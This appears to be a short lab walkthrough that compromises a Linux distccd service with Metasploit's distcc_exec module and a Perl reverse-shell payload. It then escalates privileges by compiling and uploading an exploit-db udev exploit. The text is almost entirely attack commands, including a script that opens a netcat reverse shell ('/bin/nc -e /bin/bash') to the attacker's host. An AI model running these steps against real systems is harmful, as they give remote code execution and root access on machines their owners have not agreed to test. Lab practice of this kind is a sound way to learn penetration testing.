This module uses a documented security weakness to execute arbitrary commands on any system running distccd.

Rapid 7

Search Exploit

msf5 exploit(unix/misc/distcc_exec) > search distcc
msf5 exploit(unix/misc/distcc_exec) > info
Attack Linux DistCC Daemon

Find respective Payload

msf5 exploit(unix/misc/distcc_exec) > show payloads
msf5 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse_perl
Attack Linux DistCC Daemon
msf5 exploit(unix/misc/distcc_exec) > set RHOSTS 172.16.74.129
msf5 exploit(unix/misc/distcc_exec) > set LHOST 172.16.74.128
msf5 exploit(unix/misc/distcc_exec) > show options
Attack Linux DistCC Daemon
msf5 exploit(unix/misc/distcc_exec) > exploit
Attack Linux DistCC Daemon
Attack Linux DistCC Daemon
hostname
ip a
whoami

We Don’t have Root, now what?

Privileged Escalation

gcc /usr/share/exploitdb/exploits/linux/local/8572.c -o /root/PriveEscal
upload /root/PriveEscal /tmp/PriveEscal
echo  '#!/bin/bash' > /tmp/run
echo '/bin/nc -e /bin/bash 172.16.74.128 4445' >> /tmp/run
ps -eaf | grep udev | grep -v grep
Substract 1 to your PID
./PriveEscal 2743